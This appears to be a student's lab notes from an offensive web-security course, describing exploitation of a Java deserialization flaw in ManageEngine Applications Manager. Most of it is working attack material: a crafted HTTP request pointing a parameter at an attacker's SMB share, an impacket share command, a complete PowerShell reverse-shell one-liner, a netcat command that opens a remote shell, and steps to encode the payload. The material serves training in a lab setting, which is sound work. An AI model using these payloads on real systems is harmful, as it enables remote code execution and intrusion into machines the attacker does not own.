8.4
Although we have not discussed Java deserialization vulnerabilities in this course, it is worth mentioning that one such vulnerability exists in the ManageEngine Applications Manager instance in your lab. We encourage you to get familiar with the Java ysoserial version and try to identify and exploit this vulnerability.
- Search code base for readObject or Serializable (e.g.
java.util.HashMap today = (java.util.HashMap)ois.readObject();) - Find request location:
POST /servlet/CustomFieldsFeedServlet?customFieldObject=\\\\192.168.119.135\\AWAE\\exploit HTTP/1.1
Host: 192.168.135.113:8443
Cookie: JSESSIONID_APM_9090=DD2EA485CD9594E5E6013D1DC3123987; testcookie=; am_username=; am_check=
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close
Content-Length: 0
- CustomFieldObject can accept a filename:
fileName = request.getParameter("customFieldObject"); - In Windows, we can accept a UNC path, such as pointing to a remote SMB share.
- Create a share -
python3 /usr/share/doc/python3-impacket/examples/smbserver.py awae ~/AWAE/Share - Use cmd.exe + nc.exe OR powershell.exe payload:
$client = New-Object System.Net.Sockets.TCPClient('192.168.119.120',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};
cmd.exe /c \\\\192.168.119.135\\awae\\nc.exe 192.168.119.135 9000 -e cmd.exe (Use binary `cp /usr/share/windows-binaries/nc.exe`)
- Encode the payload, otherwise may run into issues receiving the reverse shell
iconv -f ASCII -t UTF-16LE shell.txt | base64 | tr -d "\n"
powershell -EncodedCommand [result_for_iconv]